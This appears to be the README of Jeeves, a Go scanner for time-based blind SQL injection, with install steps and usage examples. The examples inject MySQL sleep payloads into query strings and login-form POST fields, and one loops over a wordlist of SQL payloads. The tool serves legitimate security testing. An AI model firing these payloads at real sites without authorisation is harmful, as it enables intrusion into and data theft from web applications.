Jeeves is made for looking to Time-Based Blind SQLInjection through recon.

Installation & Requirements

Installing Jeeves 

$ go install


$ git clone
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

Usage & Explanation

Single urls

echo ‘’ | jeeves -t payload_time
echo “” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5
echo “” | qsreplace “(select(0)from(select(sleep(10)))v)” | jeeves -t 10

In –payload-time you must use the time mentioned in payload

From list

cat targets | jeeves --payload-time 5

Adding Headers

Pay attention to the syntax! Must be the same =>

echo “” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -H “Testing: testing;OtherHeader: Value;Other2: Value”

Using proxy

echo “” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 –proxy “http://ip:port”
echo “” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -p “http://ip:port”

Proxy + Headers =>

echo “” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5 –proxy “http://ip:port” -H “User-Agent: xxxx”

Post Request

Sending data through post request ( login forms, etc )

Pay attention to the syntax! Must be equal! ->

echo “” | jeeves -t 10 -d “user=(select(0)from(select(sleep(5)))v)&password=xxx”
echo “” | jeeves -t 10 -H “Header1: Value1” -d “username=admin&password=’+(select*from(select(sleep(5)))a)+'” -p “http://yourproxy:port”

Another ways of Usage

You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght

Command line flags

-t, –payload-time, The time from payload
-p, –proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, –headers Custom Headers
-d, –data Sending Post request with data
-h Show This Help Message

Using with sql payloads wordlist

cat sql_wordlist.txt | while read payload;do echo | qsreplace $payload | jeeves -t 5;done